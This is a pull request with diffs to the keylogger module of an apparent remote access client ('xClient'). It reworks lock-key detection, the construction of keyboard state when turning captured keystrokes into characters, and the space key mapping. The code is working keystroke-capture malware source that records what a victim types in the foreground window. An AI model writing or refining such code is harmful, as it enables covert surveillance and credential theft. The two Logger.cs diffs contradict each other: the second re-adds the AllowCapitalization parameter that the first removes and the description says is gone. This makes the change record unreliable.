### PR TITLE
Some changes

### DIFF
--- a/Client/Core/Keylogger/KeyloggerHelpers.cs
+++ b/Client/Core/Keylogger/KeyloggerHelpers.cs
@@ -4,6 +4,7 @@ using System.Text;
 using System.Reflection;
 using xClient.Core.Keylogger;
 using System.Runtime.CompilerServices;
+using System.Windows.Forms;
 
 namespace xClient.Core.Keylogger
 {
@@ -92,17 +93,34 @@ namespace xClient.Core.Keylogger
         /// <returns>True if key is pressed; False if the key is not.</returns>
         public static bool IsKeyPressed(this short sender)
         {
-            return (sender & 0x8000) == 0x8000;
+            return (sender & 0x8000) != 0;
         }
 
         /// <summary>
-        /// Determines if the key code provided is in a toggled state.
+        /// Determines if the number lock key code provided is in a toggled state.
         /// </summary>
-        /// <param name="sender">The code for the key.</param>
         /// <returns>True if toggled on; False if toggled off.</returns>
-        public static bool IsKeyToggled(this short sender)
+        public static bool NumLockToggled()
         {
-            return (sender & 0xffff) == 0xffff;
+            return Control.IsKeyLocked(Keys.NumLock);
+        }
+
+        /// <summary>
+        /// Determines if the scroll lock key code provided is in a toggled state.
+        /// </summary>
+        /// <returns>True if toggled on; False if toggled off.</returns>
+        public static bool ScrollLockToggled()
+        {
+            return Control.IsKeyLocked(Keys.Scroll);
+        }
+
+        /// <summary>
+        /// Determines if the caps lock key code provided is in a toggled state.
+        /// </summary>
+        /// <returns>True if toggled on; False if toggled off.</returns>
+        public static bool CapsLockToggled()
+        {
+            return Control.IsKeyLocked(Keys.CapsLock);
         }
 
         public static string BuildString(this KeyloggerModifierKeys sender)

--- a/Client/Core/Keylogger/KeyloggerKeys.cs
+++ b/Client/Core/Keylogger/KeyloggerKeys.cs
@@ -59,9 +59,9 @@ namespace xClient.Core.Keylogger
                 AltKeyPressed = Win32.GetAsyncKeyState(KeyloggerKeys.VK_MENU).IsKeyPressed(),
                 ShiftKeyPressed = Win32.GetAsyncKeyState(KeyloggerKeys.VK_SHIFT).IsKeyPressed(),
                 // Modifier keys that have a state (toggle 'on' or 'off').
-                CapsLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_CAPITAL).IsKeyToggled(),
-                NumLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_NUMLOCK).IsKeyToggled(),
-                ScrollLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_SCROLL).IsKeyToggled()
+                CapsLock = KeyloggerHelpers.CapsLockToggled(),
+                NumLock = KeyloggerHelpers.NumLockToggled(),
+                ScrollLock = KeyloggerHelpers.ScrollLockToggled()
             };
 
             // To avoid having to repeatedly check if one of the modifier
@@ -178,7 +178,7 @@ namespace xClient.Core.Keylogger
         /// <summary>
         /// SPACEBAR key.
         /// </summary>
-        [KeyloggerKey("SPACE", true)]
+        [KeyloggerKey(" ")]
         VK_SPACE = 0x20,
 
         /// <summary>

--- a/Client/Core/Keylogger/Logger.cs
+++ b/Client/Core/Keylogger/Logger.cs
@@ -174,7 +174,7 @@ namespace xClient.Core.Keylogger
                                 // The pressed key is not special, but we have encountered
                                 // a situation of multiple key presses, so just build them.
                                 _logFileBuffer.Append(HighlightSpecialKey(k.ModifierKeys.BuildString() +
-                                                      FromKeys(k, false)));
+                                                      FromKeys(k)));
                             }
                         }
                         // We don't have to worry about nearly all modifier keys...
@@ -312,20 +312,29 @@ namespace xClient.Core.Keylogger
             return Win32.GetKeyboardLayout(Win32.GetWindowThreadProcessId(Win32.GetForegroundWindow(), out pid));
         }
 
-        private char? FromKeys(LoggedKey key, bool AllowCapitalization = true)
+        private char? FromKeys(LoggedKey key)
         {
             //keyStates is a byte array that specifies the current state of the keyboard and keys
             //The keys we are interested in are modifier keys such as shift and caps lock
             byte[] keyStates = new byte[256];
 
-            keyStates[(int)KeyloggerKeys.VK_SHIFT] = (key.ModifierKeys.ShiftKeyPressed && AllowCapitalization) ? (byte)128 : (byte)0;
-            keyStates[(int)KeyloggerKeys.VK_CAPITAL] = (key.ModifierKeys.CapsLock && AllowCapitalization) ? (byte)128 : (byte)0;
+            if (key.ModifierKeys.ShiftKeyPressed)
+                keyStates[(int) KeyloggerKeys.VK_SHIFT] = 0x80;
 
-            keyStates[(int)KeyloggerKeys.VK_MENU] = key.ModifierKeys.CtrlKeyPressed ? (byte)128 : (byte)0;
-            keyStates[(int)KeyloggerKeys.VK_CONTROL] = key.ModifierKeys.AltKeyPressed ? (byte)128 : (byte)0;
+            if (key.ModifierKeys.AltKeyPressed)
+                keyStates[(int) KeyloggerKeys.VK_MENU] = 0x80;
 
-            keyStates[(int)KeyloggerKeys.VK_NUMLOCK] = key.ModifierKeys.NumLock ? (byte)128 : (byte)0;
-            keyStates[(int)KeyloggerKeys.VK_SCROLL] = key.ModifierKeys.ScrollLock ? (byte)128 : (byte)0;
+            if (key.ModifierKeys.CtrlKeyPressed)
+                keyStates[(int) KeyloggerKeys.VK_CONTROL] = 0x80;
+
+            if (key.ModifierKeys.CapsLock)
+                keyStates[(int) KeyloggerKeys.VK_CAPITAL] = 0x01;
+
+            if (key.ModifierKeys.ScrollLock)
+                keyStates[(int) KeyloggerKeys.VK_SCROLL] = 0x01;
+
+            if (key.ModifierKeys.NumLock)
+                keyStates[(int) KeyloggerKeys.VK_NUMLOCK] = 0x01;
 
             var sb = new StringBuilder(10);
 

--- a/Client/Core/Keylogger/Logger.cs
+++ b/Client/Core/Keylogger/Logger.cs
@@ -174,7 +174,7 @@ namespace xClient.Core.Keylogger
                                 // The pressed key is not special, but we have encountered
                                 // a situation of multiple key presses, so just build them.
                                 _logFileBuffer.Append(HighlightSpecialKey(k.ModifierKeys.BuildString() +
-                                                      FromKeys(k)));
+                                                      FromKeys(k, false)));
                             }
                         }
                         // We don't have to worry about nearly all modifier keys...
@@ -312,13 +312,13 @@ namespace xClient.Core.Keylogger
             return Win32.GetKeyboardLayout(Win32.GetWindowThreadProcessId(Win32.GetForegroundWindow(), out pid));
         }
 
-        private char? FromKeys(LoggedKey key)
+        private char? FromKeys(LoggedKey key, bool AllowCapitalization = true)
         {
             //keyStates is a byte array that specifies the current state of the keyboard and keys
             //The keys we are interested in are modifier keys such as shift and caps lock
             byte[] keyStates = new byte[256];
 
-            if (key.ModifierKeys.ShiftKeyPressed)
+            if (key.ModifierKeys.ShiftKeyPressed && AllowCapitalization)
                 keyStates[(int) KeyloggerKeys.VK_SHIFT] = 0x80;
 
             if (key.ModifierKeys.AltKeyPressed)
@@ -327,7 +327,7 @@ namespace xClient.Core.Keylogger
             if (key.ModifierKeys.CtrlKeyPressed)
                 keyStates[(int) KeyloggerKeys.VK_CONTROL] = 0x80;
 
-            if (key.ModifierKeys.CapsLock)
+            if (key.ModifierKeys.CapsLock && AllowCapitalization)
                 keyStates[(int) KeyloggerKeys.VK_CAPITAL] = 0x01;
 
             if (key.ModifierKeys.ScrollLock)


### PR DESCRIPTION
used .net framework to specify toggle keys for specific keys

removed AllowCapitalization, we only need the shift and caps keystates
to get the correct unicode character

removed ternary operators, we only need to specify the keystate that we
know

fixed space attribute, removed special attribute and fixed the space
value